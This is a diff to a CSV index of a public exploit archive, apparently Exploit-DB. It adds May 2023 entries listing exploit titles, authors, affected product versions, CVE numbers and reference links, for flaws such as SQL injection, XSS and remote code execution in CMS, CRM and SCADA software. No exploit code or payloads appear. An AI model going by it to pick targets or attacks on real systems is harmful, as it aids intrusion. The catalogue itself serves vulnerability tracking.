+51460,exploits/hardware/remote/51460.txt,"Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx)",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
 50936,exploits/hardware/remote/50936.txt,"SDT-CW3B1 1.1.0 - OS Command Injection",2022-05-17,"Ahmed Alroky",remote,hardware,,2022-05-17,2022-05-17,0,CVE-2021-46422,,,,,
 37184,exploits/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",remote,hardware,,2015-06-04,2016-12-04,0,OSVDB-122937,,,,,
 43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware,,2018-01-16,2018-01-16,0,CVE-2018-5347,,,,,https://blogs.securiteam.com/index.php/archives/3548
@@ -4628,6 +4635,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46581,exploits/hardware/webapps/46581.txt,"PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery",2019-03-20,"Kumar Saurav",webapps,hardware,80,2019-03-20,2019-03-20,0,CVE-2019-6282,"Cross-Site Request Forgery (CSRF)",,,,https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-cross-site-request-forgery-csrf/
 46580,exploits/hardware/webapps/46580.txt,"PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control",2019-03-20,"Kumar Saurav",webapps,hardware,80,2019-03-20,2019-03-20,0,CVE-2019-6279,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-incorrect-access-control/
 48757,exploits/hardware/webapps/48757.txt,"PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)",2020-08-20,"İsmail ERKEK",webapps,hardware,,2020-08-20,2020-08-20,0,,,,,,
+51448,exploits/hardware/webapps/51448.txt,"PnPSCADA v2.x - Unauthenticated PostgreSQL Injection",2023-05-23,"Momen Eldawakhly",webapps,hardware,,2023-05-23,2023-05-23,0,CVE-2023-1934,,,,,
 17377,exploits/hardware/webapps/17377.txt,"Polycom IP Phone - Web Interface Data Disclosure",2011-06-09,"Yakir Wizman",webapps,hardware,,2011-06-09,2011-06-09,0,OSVDB-73117,,,,,
 37449,exploits/hardware/webapps/37449.txt,"Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities",2015-06-30,"SEC Consult",webapps,hardware,,2015-06-30,2015-06-30,0,CVE-2015-4685;CVE-2015-4684;CVE-2015-4683;CVE-2015-4682;CVE-2015-4681;OSVDB-123783;OSVDB-123782;OSVDB-123780;OSVDB-123779;OSVDB-123778;OSVDB-123776,,,,,
 41175,exploits/hardware/webapps/41175.txt,"Polycom VVX Web Interface - Change Admin Password",2017-01-26,"Mike Brown",webapps,hardware,,2017-01-26,2017-01-26,0,,,,,,
@@ -10304,6 +10312,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 11029,exploits/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Security Bypass",2010-01-06,alnjm33,local,multiple,,2010-01-05,,0,,,,,,
 8067,exploits/multiple/local/8067.txt,"Enomaly ECP / Enomalism < 2.2.1 - Multiple Local Vulnerabilities",2009-02-16,"Sam Johnston",local,multiple,,2009-02-15,,1,CVE-2009-0390,,,,,
 10326,exploits/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Local Buffer Overflow",2009-02-03,"Wolfgang Hamann",local,multiple,,2009-02-02,2017-07-14,0,,,2009-12-05-34340.ps,,,
+51469,exploits/multiple/local/51469.txt,"Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution",2023-05-23,8bitsec,local,multiple,,2023-05-23,2023-05-23,0,CVE-2023-31873,,,,,
 19430,exploits/multiple/local/19430.txt,"GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage",1999-07-25,"Pawel Wilk",local,multiple,,1999-07-25,2012-06-27,1,OSVDB-83457,,,,,https://www.securityfocus.com/bid/540/info
 24923,exploits/multiple/local/24923.txt,"Google AD Sync Tool - Exposure of Sensitive Information",2013-04-08,"Sense of Security",local,multiple,,2013-04-08,2013-04-08,0,OSVDB-91982,,,,,http://www.senseofsecurity.com.au/advisories/SOS-13-001.pdf
 39656,exploits/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,local,multiple,,2016-04-04,2016-04-04,0,CVE-2016-2087,,,,http://www.exploit-db.comhexchat-2.10.0.tar.xz,
@@ -10441,6 +10450,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45697,exploits/multiple/local/45697.txt,"xorg-x11-server < 1.20.3 - Local Privilege Escalation",2018-10-25,"Hacker Fantastic",local,multiple,,2018-10-26,2018-10-26,0,CVE-2018-14665,,,,,https://twitter.com/hackerfantastic/status/1055517801224396800
 9985,exploits/multiple/local/9985.txt,"Xpdf 3.01 - Local Heap Overflow / Null Pointer Dereference",2009-10-17,"Adam Zabrocki",local,multiple,,2009-10-16,,1,,,,,,
 9097,exploits/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink",2009-07-09,kingcope,local,multiple,,2009-07-08,,1,OSVDB-55971,,,,,
+51470,exploits/multiple/local/51470.txt,"Yank Note v3.52.1 (Electron) - Arbitrary Code Execution",2023-05-23,8bitsec,local,multiple,,2023-05-23,2023-05-23,0,CVE-2023-31874,,,,,
 50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",2021-11-08,LIWEI,local,multiple,,2021-11-08,2021-11-08,0,,,,,http://www.exploit-db.comzlog-1.2.15.tar.gz,
 32945,exploits/multiple/remote/32945.txt,"010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",remote,multiple,,2009-04-21,2014-04-22,1,OSVDB-53926;OSVDB-53925,,,,,https://www.securityfocus.com/bid/34662/info
 24730,exploits/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",remote,multiple,,2004-11-10,2013-03-12,1,,,,,,https://www.securityfocus.com/bid/11652/info
@@ -11551,6 +11561,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42324,exploits/multiple/webapps/42324.py,"Apache Struts 2.3.x Showcase - Remote Code Execution",2017-07-07,"Vex Woo",webapps,multiple,,2017-07-14,2018-05-17,1,CVE-2017-9791;S2-048,,s2-048;Struts-048,,,https://github.com/nixawk/labs/blob/943764ccb3b36a419729062f23972fd0d726bd24/CVE-2017-9791/exploit_S2-048.py
 44583,exploits/multiple/webapps/44583.txt,"Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection",2014-01-14,"Takeshi Terada",webapps,multiple,,2018-05-03,2018-05-03,1,CVE-2013-2251,,,,,
 50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",2021-06-30,"Dolev Farhi",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,,
+51447,exploits/multiple/webapps/51447.py,"Apache Superset 2.0.0 - Authentication Bypass",2023-05-23,MaanVader,webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-27524,,,,,
 48143,exploits/multiple/webapps/48143.py,"Apache Tomcat - AJP 'Ghostcat File Read/Inclusion",2020-02-20,YDHCUI,webapps,multiple,,2020-02-27,2020-03-02,0,CVE-2020-1938,,,,,https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/8bd38f4cf22331ecf4e48096a78c5931509c26be/CNVD-2020-10487-Tomcat-Ajp-lfi.py
 49039,exploits/multiple/webapps/49039.rb,"Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion (Metasploit)",2020-11-13,SunCSR,webapps,multiple,,2020-11-13,2020-11-13,1,CVE-2020-1938,,,,,
 10292,exploits/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting",2009-12-01,MustLive,webapps,multiple,,2009-11-30,2010-07-09,1,,,,,http://www.exploit-db.comjakarta-tomcat-3.2.1.tar.gz,
@@ -11757,6 +11768,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 33731,exploits/multiple/webapps/33731.txt,"Friendly Technologies TR-069 ACS 2.8.9 - Login SQL Injection",2010-03-10,"Yaniv Miron",webapps,multiple,,2010-03-10,2014-06-13,1,,,,,,https://www.securityfocus.com/bid/38634/info
 9720,exploits/multiple/webapps/9720.txt,"FSphp 0.2.1 - Multiple Remote File Inclusions",2009-09-18,NoGe,webapps,multiple,,2009-09-17,,1,OSVDB-58317;CVE-2009-3307;OSVDB-58316;OSVDB-58315,,,,,
 43442,exploits/multiple/webapps/43442.txt,"FTP Service < 1.2 - Multiple Vulnerabilities",2003-06-03,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00007,,,,,http://gulftech.org/advisories/FTP%20Service%20Multiple%20Vulnerabilities/7
+51480,exploits/multiple/webapps/51480.txt,"FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-25439,,,,,
 50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,,
 37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,,
 50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",2021-08-05,"Amin Bohio",webapps,multiple,,2021-08-05,2021-08-05,0,,,,,,
@@ -12009,6 +12021,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5
 51343,exploits/multiple/webapps/51343.txt,"Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-0020,,,,,
 51391,exploits/multiple/webapps/51391.py,"PaperCut NG/MG 22.0.4 - Authentication Bypass",2023-04-25,MaanVader,webapps,multiple,,2023-04-25,2023-04-25,0,CVE-2023-27350,,,,,
+51452,exploits/multiple/webapps/51452.py,"PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)",2023-05-23,MaanVader,webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-27350,,,,,
 35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt
 50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",2021-10-04,"Yasser Khan",webapps,multiple,,2021-10-04,2021-10-04,0,CVE-2021-41381,,,,,
 51099,exploits/multiple/webapps/51099.txt,"Pega Platform 8.1.0 - Remote Code Execution (RCE)",2023-03-28,"Marcin Wolak",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-24082,,,,,
@@ -13523,6 +13536,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 6270,exploits/php/webapps/6270.txt,"Affiliate Directory - 'id' SQL Injection",2008-08-19,"Hussin X",webapps,php,,2008-08-18,2016-11-17,1,CVE-2008-3719;OSVDB-47557,,,,,
 5108,exploits/php/webapps/5108.txt,"Affiliate Market 0.1 Beta - 'Language' Local File Inclusion",2008-02-13,GoLd_M,webapps,php,,2008-02-12,2016-11-14,1,OSVDB-41787;CVE-2008-0794,,,,http://www.exploit-db.comaffmarket.30.03.07.zip,
 5114,exploits/php/webapps/5114.pl,"Affiliate Market 0.1 Beta - Cross-Site Scripting / SQL Injection",2008-02-14,"Khashayar Fereidani",webapps,php,,2008-02-13,2016-11-14,1,OSVDB-42852;CVE-2008-1177;OSVDB-42851;CVE-2008-1176,,,,http://www.exploit-db.comaffmarket.30.03.07.zip,
+51468,exploits/php/webapps/51468.txt,"Affiliate Me Version 5.0.1 - SQL Injection",2023-05-23,h4ck3r,webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 43265,exploits/php/webapps/43265.txt,"Affiliate MLM Script 1.0 - 'product-category.php?key' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80,2017-12-09,2017-12-13,0,CVE-2017-17598,"SQL Injection (SQLi)",,,,
 42527,exploits/php/webapps/42527.txt,"Affiliate Niche Script 3.4.0 - SQL Injection",2017-08-21,"Ihsan Sencan",webapps,php,,2017-08-21,2017-08-21,0,,,,,,
 50678,exploits/php/webapps/50678.txt,"Affiliate Pro 1.7 - 'Multiple' Cross Site Scripting (XSS)",2022-01-19,Vulnerability-Lab,webapps,php,,2022-01-19,2022-01-19,0,,,,,,
@@ -14635,6 +14649,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9472,exploits/php/webapps/9472.txt,"Best Dating Script - Arbitrary File Upload",2009-08-18,jetli007,webapps,php,,2009-08-17,,1,,,,,,
 51280,exploits/php/webapps/51280.txt,"Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload",2023-04-06,"Ahmed Ismail",webapps,php,,2023-04-06,2023-05-18,1,CVE-2023-0943,,,,,
 51279,exploits/php/webapps/51279.txt,"Best pos Management System v1.0 - SQL Injection",2023-04-06,"Ahmed Ismail",webapps,php,,2023-04-06,2023-04-06,0,,,,,,
+51462,exploits/php/webapps/51462.py,"Best POS Management System v1.0 - Unauthenticated Remote Code Execution",2023-05-23,"Mesut Cetin",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 49122,exploits/php/webapps/49122.txt,"Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)",2020-11-27,Ex.Mi,webapps,php,,2020-11-27,2020-12-01,0,CVE-2020-24963,,,,,
 10655,exploits/php/webapps/10655.txt,"Best Top List - Cross-Site Scripting",2009-12-25,indoushka,webapps,php,,2009-12-24,,1,OSVDB-61372,,,,,
 10685,exploits/php/webapps/10685.txt,"Best Top List 2.11 - Arbitrary File Upload",2009-12-26,indoushka,webapps,php,,2009-12-25,,0,,,,,,
@@ -14862,6 +14877,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,,2020-10-23,2020-11-13,1,CVE-2019-17240,,,,,
 49037,exploits/php/webapps/49037.rb,"Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)",2020-11-13,Aporlorxl23,webapps,php,,2020-11-13,2020-11-13,1,,,,,,
 51360,exploits/php/webapps/51360.txt,"Bludit 4.0.0-rc-2 - Account takeover",2023-04-14,nu11secur1ty,webapps,php,,2023-04-14,2023-04-14,0,,,,,,
+51476,exploits/php/webapps/51476.txt,"Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-31698,,,,,
 46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-1000811,,,,http://www.exploit-db.combludit-3.0.0.zip,
 11360,exploits/php/webapps/11360.txt,"Blue Dove - SQL Injection",2010-02-08,HackXBack,webapps,php,,2010-02-07,,0,,,,,,
 7797,exploits/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - 'clanek' Blind SQL Injection",2009-01-15,darkjoker,webapps,php,,2009-01-14,2017-01-17,1,OSVDB-51769;CVE-2009-0425,,,,,
@@ -15501,6 +15517,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51319,exploits/php/webapps/51319.py,"ChurchCRM 4.5.1 - Authenticated SQL Injection",2023-04-07,Arvandy,webapps,php,,2023-04-07,2023-04-07,0,CVE-2023-24787,,,,,
 51397,exploits/php/webapps/51397.txt,"ChurchCRM v4.5.3 - Authenticated SQL Injection",2023-04-27,"Iyaad Luqman K",webapps,php,,2023-04-27,2023-05-07,1,CVE-2023-24685,,,,,
 51296,exploits/php/webapps/51296.txt,"ChurchCRM v4.5.3-121fcc1 - SQL Injection",2023-04-06,nu11secur1ty,webapps,php,,2023-04-06,2023-04-06,0,,,,,,
+51477,exploits/php/webapps/51477.txt,"ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-31699,,,,,
 15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,webapps,php,,2011-01-01,2011-01-01,1,OSVDB-70253,,,,http://www.exploit-db.comchurchinfo-1.2.12.zip,
 36874,exploits/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",webapps,php,,2012-02-22,2015-05-01,1,CVE-2012-1001;OSVDB-79456,,,,,https://www.securityfocus.com/bid/52115/info
 36875,exploits/php/webapps/36875.txt,"Chyrp 2.1.2 - '/includes/error.php?body' Cross-Site Scripting",2012-02-22,"High-Tech Bridge SA",webapps,php,,2012-02-22,2015-05-01,1,CVE-2012-1001;OSVDB-79455,,,,,https://www.securityfocus.com/bid/52117/info
@@ -15537,6 +15554,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47046,exploits/php/webapps/47046.txt,"CiuisCRM 1.6 - 'eventType' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,80,2019-07-01,2019-07-03,0,,"SQL Injection (SQLi)",,,,
 11124,exploits/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-13,h00die,webapps,php,,2010-01-12,,1,,,,,http://www.exploit-db.comcivicrm-3.1.beta1-standalone.tar.gz,
 35327,exploits/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",webapps,php,,2011-02-08,2014-11-23,1,,,,,,https://www.securityfocus.com/bid/46275/info
+51478,exploits/php/webapps/51478.txt,"CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-25440,,,,,
 34749,exploits/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 - 'admin_index.php' Cross-Site Scripting",2009-07-21,Moudi,webapps,php,,2009-07-21,2014-09-23,1,CVE-2009-3509;OSVDB-56181,,,,,https://www.securityfocus.com/bid/43498/info
 25623,exploits/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 - 'OUT.php' SQL Injection",2005-05-06,Kold,webapps,php,,2005-05-06,2016-12-22,1,CVE-2005-1506;OSVDB-16159,,,,,https://www.securityfocus.com/bid/13533/info
 6536,exploits/php/webapps/6536.pl,"CJ Ultra Plus 1.0.4 - Cookie SQL Injection",2008-09-22,-SmoG-,webapps,php,,2008-09-21,,1,OSVDB-48724;CVE-2008-4241,,,,,
@@ -17356,6 +17374,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9235,exploits/php/webapps/9235.php,"e107 Plugin my_gallery 2.4.1 - 'readfile()' Local File Disclosure",2009-07-23,NoGe,webapps,php,,2009-07-22,,1,,,,,,
 8417,exploits/php/webapps/8417.txt,"e107 Plugin userjournals_menu - 'blog.id' SQL Injection",2009-04-13,boom3rang,webapps,php,,2009-04-12,,1,OSVDB-53641,,,,,
 7184,exploits/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - 'product' SQL Injection",2008-11-22,NoGe,webapps,php,,2008-11-21,2017-01-03,1,OSVDB-50171;CVE-2008-6114,,,,,
+51449,exploits/php/webapps/51449.txt,"e107 v2.3.2 - Reflected XSS",2023-05-23,"Hubert Wojciechowski",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 24138,exploits/php/webapps/24138.txt,"e107 Website System 0.5/0.6 - 'Log.php' HTML Injection",2004-05-21,Chinchilla,webapps,php,,2004-05-21,2013-01-15,1,CVE-2004-2028;OSVDB-6345,,,,,https://www.securityfocus.com/bid/10395/info
 22958,exploits/php/webapps/22958.txt,"e107 Website System 0.554 - HTML Injection",2003-07-25,"Pete Foster",webapps,php,,2003-07-25,2012-11-27,1,OSVDB-2305,,,,,https://www.securityfocus.com/bid/8279/info
 22956,exploits/php/webapps/22956.txt,"e107 Website System 0.555 - 'db.php' Information Disclosure",2003-07-24,"Artoor Petrovich",webapps,php,,2003-07-24,2012-11-27,1,OSVDB-3856,,,,,https://www.securityfocus.com/bid/8273/info
@@ -18255,7 +18274,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12763,exploits/php/webapps/12763.txt,"File Share scriptFile share - SQL Injection",2010-05-27,MouDy-Dz,webapps,php,,2010-05-26,,0,,,,,,
 6040,exploits/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injections",2008-07-11,"Nu Am Bani",webapps,php,,2008-07-10,2016-12-14,1,OSVDB-23864;CVE-2006-1278;OSVDB-23863,,,,http://www.exploit-db.comfilestore.zip,
 12617,exploits/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",webapps,php,,2010-05-15,2017-07-14,0,OSVDB-55934,,file_thingie_v255_Jeremiah.zip,,,
-51436,exploits/php/webapps/51436.py,"File Thingie 2.5.7 - Remote Code Execution (RCE)",2023-05-05,"Maurice Fielenbach (grimlockx)",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
+51436,exploits/php/webapps/51436.py,"File Thingie 2.5.7 - Remote Code Execution (RCE)",2023-05-05,"Maurice Fielenbach",webapps,php,,2023-05-05,2023-05-23,0,,,,,,
 10689,exploits/php/webapps/10689.txt,"file upload Ar Version - Arbitrary File Upload",2009-12-26,indoushka,webapps,php,,2009-12-25,,0,,,,,,
 11450,exploits/php/webapps/11450.txt,"File Upload Manager 1.3 - Web Shell File Upload",2010-02-14,ROOT_EGY,webapps,php,,2010-02-13,2017-11-15,0,,,,,,
 30467,exploits/php/webapps/30467.txt,"File Uploader 1.1 - 'datei.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,webapps,php,,2007-08-09,2013-12-24,1,CVE-2007-4327;OSVDB-36425,,,,,https://www.securityfocus.com/bid/25253/info
@@ -18979,6 +18998,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49774,exploits/php/webapps/49774.py,"GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery",2021-04-16,boku,webapps,php,,2021-04-16,2021-10-29,0,,,,,,
 49798,exploits/php/webapps/49798.py,"GetSimple CMS My SMTP Contact Plugin 1.1.2 - Persistent Cross-Site Scripting",2021-04-23,boku,webapps,php,,2021-04-23,2021-11-01,0,,,,,,
 48745,exploits/php/webapps/48745.txt,"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)",2020-08-13,boku,webapps,php,,2020-08-13,2020-08-13,0,,,,,,
+51475,exploits/php/webapps/51475.py,"GetSimple CMS v3.3.16 - Remote Code Execution (RCE)",2023-05-23,"Youssef Muhammad",webapps,php,,2023-05-23,2023-05-23,0,CVE-2022-41544,,,,,
 4738,exploits/php/webapps/4738.txt,"gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion",2007-12-18,MhZ91,webapps,php,,2007-12-17,2016-10-20,1,OSVDB-44780;CVE-2007-6476;OSVDB-44779;CVE-2007-6475;OSVDB-41376;CVE-2007-6474;OSVDB-41375,,,,http://www.exploit-db.comGF-3XPLORER_2.4_.rar,
 645,exploits/php/webapps/645.pl,"GFHost PHP GMail - Remote Command Execution",2004-11-21,spabam,webapps,php,,2004-11-20,,1,OSVDB-11626,,,,,http://www.zone-h.org/advisories/read/id=4904
 25693,exploits/php/webapps/25693.txt,"GForge 3.x - Arbitrary Command Execution",2005-05-24,"Filippo Spike Morelli",webapps,php,,2005-05-24,2013-05-24,1,CVE-2005-1752;OSVDB-16930,,,,,https://www.securityfocus.com/bid/13716/info
@@ -22231,6 +22251,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31528,exploits/php/webapps/31528.txt,"Le Forum - 'Fichier_Acceuil' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php,,2008-03-24,2014-02-10,1,,,,,,https://www.securityfocus.com/bid/28423/info
 5887,exploits/php/webapps/5887.pl,"LE.CMS 1.4 - Arbitrary File Upload",2008-06-21,t0pP8uZz,webapps,php,,2008-06-20,,1,OSVDB-46498;CVE-2008-2833,,,,,
 36647,exploits/php/webapps/36647.txt,"Lead Capture - 'login.php' Script Cross-Site Scripting",2012-01-21,HashoR,webapps,php,,2012-01-21,2015-04-06,1,CVE-2012-0932;OSVDB-78455,,,,,https://www.securityfocus.com/bid/51785/info
+51471,exploits/php/webapps/51471.txt,"LeadPro CRM v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 11889,exploits/php/webapps/11889.txt,"leaftec CMS - Multiple Vulnerabilities",2010-03-26,Valentin,webapps,php,,2010-03-25,,1,OSVDB-63417;OSVDB-63416,,,,,
 8576,exploits/php/webapps/8576.pl,"Leap CMS 0.1.4 - 'searchterm' Blind SQL Injection",2009-04-30,YEnH4ckEr,webapps,php,,2009-04-29,,1,OSVDB-54405;CVE-2009-1613,,,,,
 8577,exploits/php/webapps/8577.txt,"Leap CMS 0.1.4 - SQL Injection / Cross-Site Scripting / Arbitrary File Upload",2009-04-30,YEnH4ckEr,webapps,php,,2009-04-29,,1,OSVDB-54405;CVE-2009-1615;OSVDB-54404;CVE-2009-1614;OSVDB-54403;OSVDB-54402;CVE-2009-1613,,,,,
@@ -27727,6 +27748,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 8866,exploits/php/webapps/8866.php,"Podcast Generator 1.2 - Unauthorized Re-Installation",2009-06-03,StAkeR,webapps,php,,2009-06-02,2016-11-23,1,OSVDB-67403;OSVDB-67402;OSVDB-67401;OSVDB-67400;OSVDB-67399;OSVDB-67398;OSVDB-67397;OSVDB-67396;OSVDB-67395;OSVDB-67393;OSVDB-67392;OSVDB-67391;OSVDB-67390;OSVDB-67389;OSVDB-67388;OSVDB-67387;OSVDB-67386;OSVDB-55258;OSVDB-55257;OSVDB-55256,,,,http://www.exploit-db.compodcastgen1.2.zip,
 16109,exploits/php/webapps/16109.txt,"Podcast Generator 1.3 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",webapps,php,,2011-02-04,2016-11-14,1,,,,,http://www.exploit-db.compodcastgen1.3.zip,http://www.htbridge.ch/advisory/local_file_inclusion_in_podcast_generator.html
 49866,exploits/php/webapps/49866.txt,"Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)",2021-05-14,"Ayşenur KARAASLAN",webapps,php,,2021-05-14,2021-05-14,0,,,,,http://www.exploit-db.comPodcastGenerator-3.1.zip,
+51454,exploits/php/webapps/51454.txt,"PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 26414,exploits/php/webapps/26414.txt,"PodHawk 1.85 - Arbitrary File Upload",2013-06-24,"CWH Underground",webapps,php,,2013-06-24,2013-06-24,0,OSVDB-94549,,,,,
 11473,exploits/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,webapps,php,,2010-02-15,,1,OSVDB-62343;CVE-2010-0671,,,,,
 17141,exploits/php/webapps/17141.txt,"Point Market System 3.1x vBulletin plugin - SQL Injection",2011-04-10,Net.Edit0r,webapps,php,,2011-04-10,2011-04-10,0,,,,,http://www.exploit-db.comPointMarket3.1.0Alpha1.rar,
@@ -27992,6 +28014,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48347,exploits/php/webapps/48347.txt,"Prestashop 1.7.6.4 - Cross-Site Request Forgery",2020-04-20,"Sivanesh Ashok",webapps,php,,2020-04-20,2020-06-18,0,,,,,,
 49755,exploits/php/webapps/49755.py,"PrestaShop 1.7.6.7 - 'location' Blind Sql Injection",2021-04-09,"Vanshal Gaur",webapps,php,,2021-04-09,2021-04-09,0,CVE-2020-15160,,,,,
 49410,exploits/php/webapps/49410.txt,"Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection",2021-01-11,"Jaimin Gondaliya",webapps,php,,2021-01-11,2021-01-11,0,,,,,,
+51463,exploits/php/webapps/51463.txt,"Prestashop 8.0.4 - CSV injection",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
